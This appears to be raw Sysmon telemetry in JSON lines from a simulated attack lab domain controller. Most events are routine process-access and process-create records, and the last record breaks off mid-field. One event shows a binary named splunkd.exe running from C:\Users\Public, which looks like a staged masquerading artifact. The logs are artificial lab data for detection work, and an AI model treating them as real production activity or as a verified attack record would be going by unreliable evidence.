{"EventTime":"2020-08-01 06:59:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7134,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:57.853\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:57.853","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7135,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:57.853\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:57.853","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7136,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:57.853\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:57.853","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7137,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:57.853\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:57.853","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7138,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:57.853\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:57.853","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7139,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:57.853\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-12ED-5F25-0000-0010946C0A00}\r\nTargetProcessId: 3840\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:57.853","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-12ED-5F25-0000-0010946C0A00}","TargetProcessId":"3840","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7140,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:58.556\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:58.556","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:59:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":7141,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:58.995\r\nProcessGuid: {E2A3D6B1-12EE-5F25-0000-0010AB6E0A00}\r\nProcessId: 3052\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:59:58.995","ProcessGuid":"{E2A3D6B1-12EE-5F25-0000-0010AB6E0A00}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:00:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7142,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:58.993\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 1376\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-12EE-5F25-0000-0010AB6E0A00}\r\nTargetProcessId: 3052\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 